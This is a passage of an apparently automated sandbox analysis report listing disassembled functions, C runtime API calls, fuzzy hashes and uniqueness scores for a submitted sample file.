                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 0
                                  • API String ID: 0-4108050209
                                  • Opcode ID: 3092a08b5cda45da8146f69f3b6bc8e1c239cc9c630920a4fda231155f3a6b0b
                                  • Instruction ID: 1db032322789cd77fb7eab9a5eabf1de6c034487fee98c34d116c28f3f32890a
                                  • Opcode Fuzzy Hash: 3092a08b5cda45da8146f69f3b6bc8e1c239cc9c630920a4fda231155f3a6b0b
                                  • Instruction Fuzzy Hash: 4561337060020C96DF38AA68C8D5FBEB3E5EF41740F5445EEE782EB28ADB619D4D8741
                                  Uniqueness

                                  Uniqueness Score: 0.03%

                                  Function 00BFB76C, Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 0
                                  • API String ID: 0-4108050209
                                  • Opcode ID: 828d8bd026309c7d52753bc7c42c3f20843970e8911ce645460bed6582189f82
                                  • Instruction ID: 142182ae09262a4c4aebfd8e709892e4059cccc76ee61ae5be72178ec4682ce5
                                  • Opcode Fuzzy Hash: 828d8bd026309c7d52753bc7c42c3f20843970e8911ce645460bed6582189f82
                                  • Instruction Fuzzy Hash: 9951137060064C96DB38AA68C9D6FBE6BDEDF81380F1844DEE78297692C7519D4CC352
                                  Uniqueness

                                  Uniqueness Score: 0.03%

                                  Function 00C098F7, Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                  Download Yara Rule
                                  Strings
                                  • GetSystemTimePreciseAsFileTime, xrefs: 00C09907
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: GetSystemTimePreciseAsFileTime
                                  • API String ID: 0-595813830
                                  • Opcode ID: 457791947d231753c4243e01f4bbf3cb2961e72d73e1f7476684dbe6fe4a0cfe
                                  • Instruction ID: 32ad0f9b876275e405d12e159911554d9583bcb44cace8eb87b9724facfb68d7
                                  • Opcode Fuzzy Hash: 457791947d231753c4243e01f4bbf3cb2961e72d73e1f7476684dbe6fe4a0cfe
                                  • Instruction Fuzzy Hash: 3EE0C236681238B3C2102291BC06BEDBA04D742FB1F144033FA08655A2D9B10810D6D2
                                  Uniqueness

                                  Uniqueness Score: 4.01%

                                  Function 00BD6820, Relevance: .2, Instructions: 190COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e9fee96bf9c751f31dea88a8a62a6e41b3ec08c1fa90b6f5c178be0417f84436
                                  • Instruction ID: 18642bc7d4783f376a7cf630028fa1aefe2d631dfa4d61fc986c316db2be8c08
                                  • Opcode Fuzzy Hash: e9fee96bf9c751f31dea88a8a62a6e41b3ec08c1fa90b6f5c178be0417f84436
                                  • Instruction Fuzzy Hash: 2F61C1799052898FDB15CFA884A12EDFFF1EF5A300F0841DAC59067743D33A5A0ACB61
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00BD6630, Relevance: .2, Instructions: 165COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a42fefcc2c882584e530599a48d797ac6b9b7be0bd38dbc5cc9f568b5b62dd09
                                  • Instruction ID: f8e952d06f425b8bbcc6468596f0b06b06db7bc1a20d8c5da7f935b6e83c9245
                                  • Opcode Fuzzy Hash: a42fefcc2c882584e530599a48d797ac6b9b7be0bd38dbc5cc9f568b5b62dd09
                                  • Instruction Fuzzy Hash: E651C230A042489FDB08CF69C8906EEBBF6EF59314F6841AEE855AB742E731D905CB50
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00BFE852, Relevance: .2, Instructions: 159COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bd977b8f15467ec82b2f4bfcfa5227289a12516ec17c60c81f069362ca5dd9d6
                                  • Instruction ID: e2eb83f537e066a964e3b51be1aebfb432b7c81488de2f6c99eb1cc72909c10e
                                  • Opcode Fuzzy Hash: bd977b8f15467ec82b2f4bfcfa5227289a12516ec17c60c81f069362ca5dd9d6
                                  • Instruction Fuzzy Hash: 9C516F71E00119AFDF04CF99C981AFEBBB2EF88304F198099E515AB251C774EE55DBA0
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00C13780, Relevance: .1, Instructions: 104COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 514942cb39c9e8045338a7990a95e9c60a30bdc72dd10b2ab6eec2d6b6d072ee
                                  • Instruction ID: 3d95f5c1eed17ed36b5e773ca4a8e972d5478a504020fe2c401dd9f06560d0e8
                                  • Opcode Fuzzy Hash: 514942cb39c9e8045338a7990a95e9c60a30bdc72dd10b2ab6eec2d6b6d072ee
                                  • Instruction Fuzzy Hash: F021B373F204394B7B0CC57E8C562BDB6E1C68C601745823AF8A6EA2C1D968D917E2E4
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00C13660, Relevance: .1, Instructions: 81COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8640979c537bad0f4ac19a8df5416aa4d7956cc378d1ccbfad1de2cc8983dfc9
                                  • Instruction ID: d5edf5f0299a4a5d1427325d6ef81954186ef8200672c8a48c44c0581b840fed
                                  • Opcode Fuzzy Hash: 8640979c537bad0f4ac19a8df5416aa4d7956cc378d1ccbfad1de2cc8983dfc9
                                  • Instruction Fuzzy Hash: 4C11CA23F30C296B675C816D8C132BAA1D2EBD824070F533AD826E7384E894DE13D290
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00C0AF0E, Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9a1cd44a34fb400067b5bd4695143b99e133377e4cd13256da2c9f20b6894054
                                  • Instruction ID: 7b687bfed45a2d47c726e97ac19c98014849f9ff76db2f736fe55efa43b2ad4e
                                  • Opcode Fuzzy Hash: 9a1cd44a34fb400067b5bd4695143b99e133377e4cd13256da2c9f20b6894054
                                  • Instruction Fuzzy Hash: 97E08CB2925328EBCB15EBC9C904A8AF3ECEB44B40B11049AF501D3141C271DE00DBD0
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00C057A0, Relevance: 22.9, APIs: 15, Instructions: 357COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$Info
                                  • String ID:
                                  • API String ID: 2509303402-0
                                  • Opcode ID: b2db08504014581ac7b6f7739e9095e99c456d4fec72c0dd3fc6029edc4ae2ce
                                  • Instruction ID: f9d6aa3c4993c971ef8825d64253feba2d0210e8665343273c6ae27da5dc8112
                                  • Opcode Fuzzy Hash: b2db08504014581ac7b6f7739e9095e99c456d4fec72c0dd3fc6029edc4ae2ce
                                  • Instruction Fuzzy Hash: 95D19C71E007059FDB21CFA8C881BEEBBF5BF09310F148169E5A5A72C2D770AA45DB60
                                  Uniqueness

                                  Uniqueness Score: 0.67%

                                  Function 00C0D905, Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • ___free_lconv_mon.LIBCMT ref: 00C0D949
                                    • Part of subcall function 00C0CB05: _free.LIBCMT ref: 00C0CB22
                                    • Part of subcall function 00C0CB05: _free.LIBCMT ref: 00C0CB34
                                    • Part of subcall function 00C0CB05: _free.LIBCMT ref: 00C0CB46
                                    • Part of subcall function 00C0CB05: _free.LIBCMT ref: 00C0CB58
                                    • Part of subcall function 00C0CB05: _free.LIBCMT ref: 00C0CB6A
                                    • Part of subcall function 00C0CB05: _free.LIBCMT ref: 00C0CB7C
                                    • Part of subcall function 00C0CB05: _free.LIBCMT ref: 00C0CB8E
                                    • Part of subcall function 00C0CB05: _free.LIBCMT ref: 00C0CBA0
                                    • Part of subcall function 00C0CB05: _free.LIBCMT ref: 00C0CBB2
                                    • Part of subcall function 00C0CB05: _free.LIBCMT ref: 00C0CBC4
                                    • Part of subcall function 00C0CB05: _free.LIBCMT ref: 00C0CBD6
                                    • Part of subcall function 00C0CB05: _free.LIBCMT ref: 00C0CBE8
                                    • Part of subcall function 00C0CB05: _free.LIBCMT ref: 00C0CBFA
                                  • _free.LIBCMT ref: 00C0D93E
                                    • Part of subcall function 00C068D3: HeapFree.KERNEL32(00000000,00000000,?,00C0D25C,?,00000000,?,?,?,00C0D4FF,?,00000007,?,?,00C0DA9C,?), ref: 00C068E9
                                    • Part of subcall function 00C068D3: GetLastError.KERNEL32(?,?,00C0D25C,?,00000000,?,?,?,00C0D4FF,?,00000007,?,?,00C0DA9C,?,?), ref: 00C068FB
                                  • _free.LIBCMT ref: 00C0D960
                                  • _free.LIBCMT ref: 00C0D975
                                  • _free.LIBCMT ref: 00C0D980
                                  • _free.LIBCMT ref: 00C0D9A2
                                  • _free.LIBCMT ref: 00C0D9B5
                                  • _free.LIBCMT ref: 00C0D9C3
                                  • _free.LIBCMT ref: 00C0D9CE
                                  • _free.LIBCMT ref: 00C0DA06
                                  • _free.LIBCMT ref: 00C0DA0D
                                  • _free.LIBCMT ref: 00C0DA2A
                                  • _free.LIBCMT ref: 00C0DA42
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                  • String ID:
                                  • API String ID: 161543041-0
                                  • Opcode ID: f85be829f4f7ce287ffdfbed14e7e86ac1273130e8b587c4b3ccb1d4f04f0e12
                                  • Instruction ID: 607504510c1307fa83b807e6065146562317f7a9e6df82c0fabb7989bb9cf499
                                  • Opcode Fuzzy Hash: f85be829f4f7ce287ffdfbed14e7e86ac1273130e8b587c4b3ccb1d4f04f0e12
                                  • Instruction Fuzzy Hash: 07314B716043059FEF21AEB8D845B5BB3E9AF01310F248529E06AD75D1DF70AE90EB61
                                  Uniqueness

                                  Uniqueness Score: 0.13%

                                  Function 00BF9228, Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 308UNIQUELIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 00BF9323
                                  • type_info::operator==.LIBVCRUNTIME ref: 00BF934A
                                  • ___TypeMatch.LIBVCRUNTIME ref: 00BF9456
                                  • CatchIt.LIBVCRUNTIME ref: 00BF94AB
                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 00BF9531
                                  • _UnwindNestedFrames.LIBCMT ref: 00BF95B8
                                  • CallUnexpected.LIBVCRUNTIME ref: 00BF95D3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                  • String ID: csm$csm$csm
                                  • API String ID: 4234981820-393685449
                                  • Opcode ID: 0a027dfe4aa2309597be32abb0c24f837e99d7ba04097b5d6851c64a3ec1fb03
                                  • Instruction ID: f7c2b181d66c032a9a2ba5ee28d2bb08bfbb99aae25cf3e54286a5837609e32a
                                  • Opcode Fuzzy Hash: 0a027dfe4aa2309597be32abb0c24f837e99d7ba04097b5d6851c64a3ec1fb03
                                  • Instruction Fuzzy Hash: 9BC1587180021DEBCF2ADFA4C881ABEBBF5EF14710F04419AEA156B252D731DA59CB91
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00C0A8AF, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301UNIQUELIBRARYCODE
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3907804496
                                  • Opcode ID: 570f5b81e476fa1a65a240fe253a221ad7229ef2365b5b064c8c3829101e4759
                                  • Instruction ID: 391c64f0a742cf0fb5a24551d6fae802f2430dc72a43555a704a6cdffbc5f5c0
                                  • Opcode Fuzzy Hash: 570f5b81e476fa1a65a240fe253a221ad7229ef2365b5b064c8c3829101e4759
                                  • Instruction Fuzzy Hash: 67C1F270E043499FDF15DFA9C880BADBBB1BF49310F058169E915AB3D2C7749A42CB62
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00C13F7A, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00C13CC1: CreateFileW.KERNEL32(00000000,00000000,?,00C14023,?,?,00000000,?,00C14023,00000000,0000000C), ref: 00C13CDE
                                  • GetLastError.KERNEL32 ref: 00C1408E
                                  • __dosmaperr.LIBCMT ref: 00C14095
                                  • GetFileType.KERNEL32(00000000), ref: 00C140A1
                                  • GetLastError.KERNEL32 ref: 00C140AB
                                  • __dosmaperr.LIBCMT ref: 00C140B4
                                  • CloseHandle.KERNEL32(00000000), ref: 00C140D4
                                  • CloseHandle.KERNEL32(00000000), ref: 00C14221
                                  • GetLastError.KERNEL32 ref: 00C14253
                                  • __dosmaperr.LIBCMT ref: 00C1425A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                  • String ID: H
                                  • API String ID: 4237864984-2852464175
                                  • Opcode ID: 1e0b9e660b60c5d86f29c94a5d4905d95a221d31e81f1134e1ab24f539f62cd6
                                  • Instruction ID: 0938a889df2910a86b5b856621748e54d7018f119a2ef7843dfa6526a49ac79a
                                  • Opcode Fuzzy Hash: 1e0b9e660b60c5d86f29c94a5d4905d95a221d31e81f1134e1ab24f539f62cd6
                                  • Instruction Fuzzy Hash: C8A10432A142589FCF199F68DC51BEE7BB1AB0B324F24425DE811EB3D1C7358A82E751
                                  Uniqueness

                                  Uniqueness Score: 0.14%

                                  Function 00C06E55, Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                  Download Yara Rule
                                  APIs
                                  • _free.LIBCMT ref: 00C06E6B
                                    • Part of subcall function 00C068D3: HeapFree.KERNEL32(00000000,00000000,?,00C0D25C,?,00000000,?,?,?,00C0D4FF,?,00000007,?,?,00C0DA9C,?), ref: 00C068E9
                                    • Part of subcall function 00C068D3: GetLastError.KERNEL32(?,?,00C0D25C,?,00000000,?,?,?,00C0D4FF,?,00000007,?,?,00C0DA9C,?,?), ref: 00C068FB
                                  • _free.LIBCMT ref: 00C06E77
                                  • _free.LIBCMT ref: 00C06E82
                                  • _free.LIBCMT ref: 00C06E8D
                                  • _free.LIBCMT ref: 00C06E98
                                  • _free.LIBCMT ref: 00C06EA3
                                  • _free.LIBCMT ref: 00C06EAE
                                  • _free.LIBCMT ref: 00C06EB9
                                  • _free.LIBCMT ref: 00C06EC4
                                  • _free.LIBCMT ref: 00C06ED2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 808cfbfc69a1b12a5e72823e52e7b74093c0918b8cddc36dda96fd49723ddb4d
                                  • Instruction ID: 667e9f93011a62e7e5057601139498e488cade416ceae74d7003fa784922560d
                                  • Opcode Fuzzy Hash: 808cfbfc69a1b12a5e72823e52e7b74093c0918b8cddc36dda96fd49723ddb4d
                                  • Instruction Fuzzy Hash: A4218376D0411CBFCF41EFA4C881DDE7BB9AF09340B0082A6B5159B1A2DB71EA64DB91
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 00BF01D0, Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 389UNIQUE
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ,$array$object$object key$object separator$value
                                  • API String ID: 0-1191195158
                                  • Opcode ID: 26bdfcf14b17995f07cc2295c4edb23dc6255c9303d705a1154f212fdd22a935
                                  • Instruction ID: 587f849bea792fb755b9a177cbb5f05750cbeb07e0a5ad53d11d957073abc571
                                  • Opcode Fuzzy Hash: 26bdfcf14b17995f07cc2295c4edb23dc6255c9303d705a1154f212fdd22a935
                                  • Instruction Fuzzy Hash: C602697090429CDFDB20EB64C885BEEFBF4AF15304F1485D9D549A7282DB706A88CFA1
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00BF69F0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120UNIQUE
                                  Download Yara Rule
                                  APIs
                                  • _ValidateLocalCookies.LIBCMT ref: 00BF6A27
                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00BF6A2F
                                  • _ValidateLocalCookies.LIBCMT ref: 00BF6AB8
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00BF6AE3
                                  • _ValidateLocalCookies.LIBCMT ref: 00BF6B38
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 1170836740-1018135373
                                  • Opcode ID: 1c5675d2d53e7076c4b609e517a009ed6d235e7b5b23df8068dfdcd5ef50706a
                                  • Instruction ID: 358242bf45b365f570b0d0577b7431275f0d709c80e7c447f9a41c40d4acf70f
                                  • Opcode Fuzzy Hash: 1c5675d2d53e7076c4b609e517a009ed6d235e7b5b23df8068dfdcd5ef50706a
                                  • Instruction Fuzzy Hash: 4D419234A0020CABCF10DF68C885AAEBBF5EF45314F14C195EE15AB392D771EA19CB90
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00C0955F, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: api-ms-$ext-ms-
                                  • API String ID: 0-537541572
                                  • Opcode ID: 18334ea15d77d771d333526d9d8795c4bf28f14080941645c8e6fa609d3ff6b8
                                  • Instruction ID: 46a068609b11858998a63379e9ea804ee3d0ac870edd73294ed240fc60c476de
                                  • Opcode Fuzzy Hash: 18334ea15d77d771d333526d9d8795c4bf28f14080941645c8e6fa609d3ff6b8
                                  • Instruction Fuzzy Hash: AE21E771A05620EBCB328B269C95B5E3768EF52B60F250220FD26A72D3D631DE00D6D0
                                  Uniqueness

                                  Uniqueness Score: 0.38%

                                  Function 00C0D4E6, Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00C0D232: _free.LIBCMT ref: 00C0D257
                                  • _free.LIBCMT ref: 00C0D534
